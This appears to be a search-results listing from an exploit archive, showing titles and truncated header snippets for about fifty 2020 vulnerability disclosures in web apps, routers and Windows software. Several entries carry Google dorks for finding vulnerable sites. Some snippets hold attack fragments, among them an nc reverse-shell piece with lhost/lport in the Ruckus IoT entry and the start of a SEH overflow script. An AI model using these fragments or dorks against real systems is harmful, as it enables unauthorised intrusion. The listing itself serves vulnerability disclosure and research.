47884 matches found
Social Networking Site - Authentication Bypass (SQli)
Exploit Title: Social Networking Site - Authentication Bypass SQli Date: 2020-11-17 Exploit Author: gh1mau Email: [email protected] Team Members: Capt'N, muzzo, chaos689 | https://h0fclanmalaysia.wordpress.com/ Vendor Homepage:...
EPSON Status Monitor 3 'EPSON_PM_RPCV4_06' - Unquoted Service Path
Exploit Title: EPSON Status Monitor 3 'EPSONPMRPCV406' - Unquoted Service Path Exploit Author : SamAlucard Exploit Date: 2020-27-11 Vendor : SEIKO EPSON Corp Version : EPSONPMRPCV406 8.0 Vendor Homepage : https://epson.com Tested on OS: Windows 7 Pro Analyze PoC : ============== C:\sc qc...
Setelsa Conacwin 3.7.1.2 - Local File Inclusion
Exploit Title: Setelsa Conacwin 3.7.1.2 - Local File Inclusion Date: 02/09/20 Exploit Author: Bryan Rodriguez Martin AKA tr3mb0 Vendor Homepage: http://setelsa-security.es/productos/control-de-acceso/ Version: 3.7.1.2 Tested on: Windows FIX: The recommendation from the vendor is to update to the...
TypeSetter 5.1 - CSRF (Change admin e-mail)
Exploit Title: TypeSetter 5.1 - CSRF Change admin e-mail Exploit Author: Alperen Ergel Software Homepage: https://www.typesettercms.com/ Version : 5.1 Tested on: Kali & ubuntu Category: WebApp Description Attacker can change admin e-mail address Vulnerable - Go to the admin page view preferences ...
10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH)
Exploit Title: 10-Strike Network Inventory Explorer 8.65 - Buffer Overflow SEH Date: 2020-09-02 Exploit Author: Sectechs Vendor Homepage: https://www.10-strike.com Version: 8.65 Tested on: Windows 7 x86 SP1 import os import sys import struct import socket crash ="A" 209 jmp short 8...
Pandora FMS 7.0 NG 749 - Multiple Persistent Cross-Site Scripting Vulnerabilities
Exploit Title: Pandora FMS 7.0 NG 749 - Multiple Persistent Cross-Site Scripting Vulnerabilities Date: 11-14-2020 Exploit Author: Matthew Aberegg Vendor Homepage: https://pandorafms.com/ Software Link: https://pandorafms.com/community/get-started/ Version: Pandora FMS 7.0 NG 749 Tested on: Ubuntu...
LEPTON CMS 4.7.0 - 'URL' Persistent Cross-Site Scripting
Exploit Title: LEPTON CMS 4.7.0 - 'URL' Persistent Cross-Site Scripting Date: 19-11-2020 Exploit Author: Sagar Banwa Vendor Homepage: https://lepton-cms.org/ Software Link: https://lepton-cms.org/english/download/archive.php Version: 4.7.0 Tested on: Windows 10/Kali Linux CVE: CVE-2020-29240 Stor...
Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path
Exploit Title: Intelr Management and Security Application 5.2 - User Notification Service Unquoted Service Path Date: 2020-08-28 Exploit Author: Metin Yunus Kandemir Vendor Homepage: https://www.intel.com/ Version: v5.2 Tested on: Windows 7 Source:...
Tailor Management System 1.0 - Unrestricted File Upload to Remote Code Execution
Exploit Title: Tailor Management System 1.0 - Unrestricted File Upload to Remote Code Execution Exploit Author: Saeed Bala Ahmed r0b0tG4nG Date: 2020-09-18 Vendor Homepage: https://www.sourcecodester.com/php/14378/tailor-management-system-php-mysql.html Software Link:...
Joomla! Component GMapFP 3.5 - Unauthenticated Arbitrary File Upload
Exploit Title: Joomla! Component GMapFP 3.5 - Unauthenticated Arbitrary File Upload Google Dork: inurl:''comgmapfp'' Date: 2020-03-27 Exploit Author: ThelastVvV Vendor Homepage: https://gmapfp.org/ Version:Version J3.5 /J3.5free Tested on: Ubuntu CVE: CVE-2020-23972 Description: An attacker can...
Online Shopping Alphaware 1.0 - Error Based SQL injection
Title: Online Shopping Alphaware 1.0 - Error-Based SQL injection Exploit Author: Moaaz Taha 0xStorm Date: 2020-08-20 Vendor Homepage: https://www.sourcecodester.com/php/14368/online-shopping-alphaware-phpmysql.html Software Link:...
Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path
Exploit Title: Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path Discovery by: Jok3r Discovery Date: 2020-09-14 Vendor Homepage: https://home.pearsonvue.com/ Software Link: https://vss.pearsonvue.com/VSSFiles/Documents/ENUTCInstallGuide/DownloadVTSInstaller.htm Test...
Multi Restaurant Table Reservation System 1.0 - Multiple Persistent XSS
Exploit Title: Multi Restaurant Table Reservation System 1.0 - Multiple Persistent XSS Date: 01-11-2020 Exploit Author: yunaranyancat Vendor Homepage: https://www.sourcecodester.com Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/tablereservation.zip Version: 1.0...
YATinyWinFTP - Denial of Service (PoC)
Exploit Title: YATinyWinFTP - Denial of Service PoC Google Dork: None Date: 20.08.2020 Exploit Author: strider Vendor Homepage: https://github.com/ik80/YATinyWinFTP Software Link: https://github.com/ik80/YATinyWinFTP Tested on: Windows 10...
Rejetto HttpFileServer 2.3.x - Remote Command Execution (3)
Exploit Title: Rejetto HttpFileServer 2.3.x - Remote Command Execution 3 Google Dork: intext:"httpfileserver 2.3" Date: 28-11-2020 Remote: Yes Exploit Author: Óscar Andreu Vendor Homepage: http://rejetto.com/ Software Link: http://sourceforge.net/projects/hfs/ Version: 2.3.x Tested on: Windows...
ATX MiniCMTS200a Broadband Gateway 2.0 - Credential Disclosure
Exploit Title: ATX MiniCMTS200a Broadband Gateway 2.0 - Credential Disclosure Date: 2020-11-20 Exploit Author: Zagros Bingol Vendor Homepage: http://www.atx.com Software Link: https://atx.com/products/commercial-services-gateways/minicmts200a-broadband-gateway/ Version: 2.0 and earlier Tested on:...
Intelbras Router RF 301K 1.1.2 - Authentication Bypass
Exploit Title: Intelbras Router RF 301K 1.1.2 - Authentication Bypass Date: 27/11/2020 Exploit Author: Kaio Amaral Vendor Homepage: https://www.intelbras.com/pt-br/ Software Link: http://backend.intelbras.com/sites/default/files/2020-10/RF301Kv1.1.2.zip Version: firmware version 1.1.2 Tested on:...
Best Support System 3.0.4 - 'ticket_body' Persistent XSS (Authenticated)
Exploit Title: Best Support System 3.0.4 - 'ticketbody' Persistent XSS Authenticated Google Dork: "Powered By Best Support System" Date: 2020-08-23 Exploit Author: Ex.Mi https://ex-mi.ru Vendor: Appsbd https://appsbd.com Software Version: 3.0.4 Software Link:...
House Rental 1.0 - 'keywords' SQL Injection
Exploit Title: House Rental 1.0 - 'keywords' SQL Injection Exploit Author: Bobby Cooke boku & Adeeb Shah @hyd3sec Date: 2020-08-07 Vendor Homepage: https://projectworlds.in Software Link: https://projectworlds.in/wp-content/uploads/2019/06/home-rental.zip Version: 1.0 Tested On: Windows 10 Pro...
Moodle 3.8 - Unrestricted File Upload
Exploit Title: Moodle 3.8 - Unrestricted File Upload Date: 2019-09-08 Exploit Author: Sirwan Veisi Vendor Homepage: https://moodle.org/ Software Link: https://github.com/moodle/moodle Version: Moodle Versions 3.8, 3.7, 3.6, 3.5, 3.4... Tested on: Moodle Version 3.8 CWE : CWE-434 I found an...
Acronis Cyber Backup 12.5 Build 16341 - Unauthenticated SSRF
Exploit Title: Acronis Cyber Backup 12.5 Build 16341 - Unauthenticated SSRF Date: 2020-07-30 Author: Julien Ahrens Vendor Homepage: https://www.acronis.com Version: 12.5 Build 16341 CVE: CVE-2020-16171 VERSIONS AFFECTED ==================== Acronis Cyber Backup v12.5 Build 16327 and probably belo...
Foxit Reader 9.0.1.1049 - Arbitrary Code Execution
Exploit Title: Foxit Reader 9.0.1.1049 - Arbitrary Code Execution Date: 2020-08-29 Exploit Author: CrossWire Vendor Homepage: https://www.foxitsoftware.com/ Software Link:...
Laravel Administrator 4 - Unrestricted File Upload (Authenticated)
Exploit title: Laravel Administrator 4 - Unrestricted File Upload Authenticated Author: Victor Campos and Xavi Beltran Contact: [email protected] Exploit Development: https://xavibel.com/2020/03/23/unrestricted-file-upload-in-frozennode-laravel-administrator/ Date: 25/3/2020 Software link:...
SAP Lumira 1.31 - Stored Cross-Site Scripting
Exploit Title: SAP Lumira 1.31 - Stored Cross-Site Scripting Date: 13.08.2020 Exploit Author: Ilca Lucian Florin Vendor Homepage: https://www.sap.com Software Link: SAP Lumira Version: 123 •...
Wordpress Theme Wibar 1.1.8 - 'Brand Component' Stored Cross Site Scripting
Exploit Title: Wordpress Theme Wibar 1.1.8 - 'Brand Component' Stored Cross Site Scripting Date: 11/27/2020 Exploit Author: Ilca Lucian Florin Vendor Homepage: http://demo.themeftc.com/wibar Software Link: https://themeforest.net/item/wibar-responsive-woocommerce-wordpress-theme/20994798 Version:...
ElkarBackup 1.3.3 - 'Policy[name]' and 'Policy[Description]' Stored Cross-site Scripting
Exploit Title: ElkarBackup 1.3.3 - 'Policyname' and 'PolicyDescription' Stored Cross-site Scripting Date: 2020-08-22 Exploit Author: Vyshnav NK Vendor Homepage: https://www.elkarbackup.org/ Software Link: https://github.com/elkarbackup/elkarbackup/wiki/Installation Version: 1.3.3 Tested on: Linux...
libupnp 1.6.18 - Stack-based buffer overflow (DoS)
Exploit Title: libupnp 1.6.18 - Stack-based buffer overflow DoS Date: 2020-08-20 Exploit Author: Patrik Lantz Vendor Homepage: https://pupnp.sourceforge.io/ Software Link: https://sourceforge.net/projects/pupnp/files/pupnp/libUPnP%201.6.6/libupnp-1.6.6.tar.bz2/download Version: = 1.6.6 Tested on:...
Wordpress Theme Accesspress Social Icons 1.7.9 - SQL injection (Authenticated)
Exploit Title: Wordpress Theme Accesspress Social Icons 1.7.9 - SQL injection Authenticated Exploit Author: SunCSR Sun Cyber Security Research - Nguyen Khang Google Dork: N/A Date: 2020-08-24 Vendor Homepage: https://accesspressthemes.com Software Link:...
Ruckus IoT Controller (Ruckus vRIoT) 1.5.1.0.21 - Remote Code Execution
Product: Ruckus IoT Controller Ruckus vRIoT Version: &1|nc "+lhost+" "+lport+" /tmp/f; " return payload def generateMagicToken: encdecmethod = 'utf-8' salt = 'nplusServiceAuth' salt = salt.encode"utf8" strkey = 'serviceN1authent' strtoenc = 'TlBMVVMx' return encryptencdecmethod, salt, strkey,...
WonderCMS 3.1.3 - 'uploadFile' Stored Cross-Site Scripting
Exploit Title: WonderCMS 3.1.3 - 'uploadFile' Stored Cross-Site Scripting Google Dork: "WonderCMS" Date: 2020-11-27 Exploit Author: SunCSR Sun Cyber Security Research Vendor Homepage: https://www.wondercms.com/ Software Link:...
Razer Chroma SDK Server 3.16.02 - Race Condition Remote File Execution
Exploit Title: Razer Chroma SDK Server 3.16.02 - Race Condition Remote File Execution Date: 2020-08-13 Exploit Author: Loke Hui Yi Vendor Homepage: https://razerid.razer.com Software Link: http://rzr.to/synapse-3-pc-download Version: , and create an exe file with the same application's name in th...
Pure-FTPd 1.0.48 - Remote Denial of Service
Exploit Title: Pure-FTPd 1.0.48 - Remote Denial of Service Date: 2020. nov. 26., 09:32:17 CET Exploit Author: xynmaps Vendor Homepage: https://www.pureftpd.org/project/pure-ftpd/ Software Link: https://github.com/jedisct1/pure-ftpd/ Version: 1.0.48 Tested on: Parrot Security OS 5.9.0 encoding=utf...
WonderCMS 3.1.3 - 'page' Persistent Cross-Site Scripting
Exploit Title: WonderCMS 3.1.3 - 'page' Persistent Cross-Site Scripting Date: 20-11-2020 Exploit Author: Mayur Parmar Vendor Homepage: https://www.wondercms.com/ Version: 3.1.3 Tested on: PopOS Stored Cross-site scriptingXSS: Stored attacks are those where the injected script is permanently store...
osCommerce 2.3.4.1 - 'title' Persistent Cross-Site Scripting
Exploit Title: osCommerce 2.3.4.1 - 'title' Persistent Cross-Site Scripting Date: 2020-11-19 Exploit Author: Emre Aslan Vendor Homepage: https://www.oscommerce.com/ Version: 2.3.4.1 Tested on: Windows & XAMPP == Tutorial https://HOST/catalog/admin/newsletters.php?action=new 3- Enter the XSS paylo...
Wondershare Driver Install Service help 10.7.1.321 - 'ElevationService' Unquote Service Path
Exploit Title: Wondershare Driver Install Service help 10.7.1.321 - 'ElevationService' Unquote Service Path Date: 2020-11-24 Exploit Author: Luis Sandoval Vendor Homepage: https://www.wondershare.com/ Software Link: https://www.wondershare.com/drfone/ Version: 10.7.1.321 Tested on: Windows 10 Hom...
SyncBreeze 10.0.28 - 'password' Remote Buffer Overflow
Exploit Title: SyncBreeze 10.0.28 - 'password' Remote Buffer Overflow Date: 18-Sep-2020 Exploit Author: Abdessalam kingA.salam Vendor Homepage: http://www.syncbreeze.com Software Link: http://www.syncbreeze.com/setups/syncbreezeentsetupv10.0.28.exe Version: 10.0.28 Tested on: Windows 7,windows...
OpenCart 3.0.3.6 - 'Profile Image' Stored Cross-Site Scripting (Authenticated)
Exploit Title: OpenCart 3.0.3.6 - 'Profile Image' Stored Cross Site Scripting Authenticated Date: 24-11-2020 Exploit Author: Hemant Patidar HemantSolo Vendor Homepage: https://www.opencart.com/ Software Link: https://www.opencart.com/index.php?route=cms/download Version: 3.0.3.6 Tested on: Window...
nopCommerce Store 4.30 - 'name' Stored Cross-Site Scripting
Exploit Title: nopCommerce Store 4.30 - 'name' Stored Cross-Site Scripting Date: 24-11-2020 Exploit Author: Hemant Patidar HemantSolo Vendor Homepage: https://www.nopcommerce.com/ Version: 4.30 Tested on: Windows 10/Kali Linux CVE: CVE-2020-29475 Stored Cross-site scriptingXSS: Stored XSS, also...
OpenCart 3.0.3.6 - 'subject' Stored Cross-Site Scripting
Exploit Title: OpenCart 3.0.3.6 - 'subject' Stored Cross-Site Scripting Date: 24-11-2020 Exploit Author: Hemant Patidar HemantSolo Vendor Homepage: https://www.opencart.com/ Software Link: https://www.opencart.com/index.php?route=cms/download Version: 3.0.3.6 Tested on: Windows 10/Kali Linux CVE:...
Apache OpenMeetings 5.0.0 - 'hostname' Denial of Service
Exploit Title: Apache OpenMeetings 5.0.0 - 'hostname' Denial of Service Google Dork: "Apache OpenMeetings DOS" Date: 2020-08-28 Exploit Author: SunCSR ThienNV - Sun Cyber Security Research Vendor Homepage: https://openmeetings.apache.org/ Software Link: https://openmeetings.apache.org/ Version:...
Seowon 130-SLC router 1.0.11 - 'ipAddr' RCE (Authenticated)
Exploit Title: Seowon 130-SLC router 1.0.11 - 'ipAddr' RCE Authenticated Date: 5 Aug 2020 Exploit Author: maj0rmil4d Vendor Homepage: http://www.seowonintech.co.kr/en/ Hardware Link: http://www.seowonintech.co.kr/en/product/detail.asp?num=150&bigkindB05&middlekindB0529 Version: 1.0.11 Possibly al...
ZeroShell 3.9.0 - 'cgi-bin/kerbynet' Remote Root Command Injection (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Zeroshell 3.9.0 Remote Command Execution', 'Description' = %q This module exploits an unauthenticated command injection vulnerability found in...
docPrint Pro 8.0 - 'Add URL' Buffer Overflow (SEH Egghunter)
Exploit Title: docPrint Pro 8.0 - 'Add URL' Buffer Overflow SEH Egghunter Date: 2020-07-26 Exploit Author: MasterVlad Vendor Homepage: http://www.verypdf.com Software Link: http://dl.verypdf.net/docprintprosetup.exe Version: 8.0 Vulnerability Type: Local Buffer Overflow Tested on: Windows 7 32-bi...
LifeRay 7.2.1 GA2 - Stored XSS
Exploit Title: LifeRay 7.2.1 GA2 - Stored XSS Date: 10/05/2020 Exploit Author: 3ndG4me Vendor Homepage: https://www.liferay.com/ Software Link: https://www.liferay.com/ Version: 7.1.0 - 7.2.1 GA2 REQUIRED Tested on: Debian Linux CVE : CVE-2020-7934 Public Exploit/Whitepaper:...
VTiger v7.0 CRM - 'To' Persistent XSS
Exploit Title: VTiger v7.0 CRM - 'To' Persistent XSS Date: 2020-11-18 Exploit Vulnerability-Lab Vendor Homepage: https://www.vtiger.com/open-source-crm/download-open-source/ Software Link: https://sourceforge.net/projects/vtigercrm/files/ Version: v7.0 Document Title: =============== VTiger v7.0...
Boxoft Audio Converter 2.3.0 - '.wav' Buffer Overflow (SEH)
Exploit Title: Boxoft Audio Converter 2.3.0 - '.wav' Buffer Overflow SEH Discovery by: Luis Martinez Discovery Date: 2020-11-22 Vendor Homepage: http://www.boxoft.com/ Software Link: http://www.boxoft.com/audio-converter/a-pdf-bac.exe Tested Version: 2.3.0 Vulnerability Type: Local Buffer Overflo...
TP-Link TL-WA855RE V5_200415 - Device Reset Auth Bypass
Exploit Title: TP-Link TL-WA855RE V5200415 - Device Reset Auth Bypass Date: 2020/07/29 Exploit Author: malwrforensics Vendor Homepage: https://tp-link.com Software link: https://static.tp-link.com/2020/202004/20200430/TL-WA855REV5200415.zip Version: TL-WA855REUSV5200415 Tested on: N/A CVE :...
IBM Tivoli Storage Manager Command Line Administrative Interface 5.2.0.1 - id' Field Stack Based Buffer Overflow
Exploit Title: IBM Tivoli Storage Manager Command Line Administrative Interface 5.2.0.1 - id' Field Stack Based Buffer Overflow Exploit Author: Paolo Stagno aka VoidSec Vendor Homepage: https://www.ibm.com/support/knowledgecenter/en/SSGSG77.1.0/com.ibm.itsm.tsm.doc/welcome.html Version: 5.2.0.1...
Zortam Mp3 Media Studio 27.60 - Remote Code Execution (SEH)
Exploit Title: Zortam Mp3 Media Studio 27.60 - Remote Code Execution SEH Date: November 19, 2020 Exploit Author: Vincent Wolterman Vendor Homepage: https://www.zortam.com/index.html Software Link: https://www.zortam.com/download.html Version: 27.60 Tested on: Windows 7 Professional SP 1 Build 760...
Boxoft Convert Master 1.3.0 - 'wav' SEH Local Exploit
Exploit Title: Boxoft Convert Master 1.3.0 - 'wav' SEH Local Exploit Date: 17.09.2020 Vendor Homepage: http://www.boxoft.com/ Software Link: http://www.boxoft.com/convert-master/setupboxoft-conver=t-master.exe Exploit Author: Achilles Tested Version: 1.3.0 Tested on: Windows 7 x64 1.- Run python...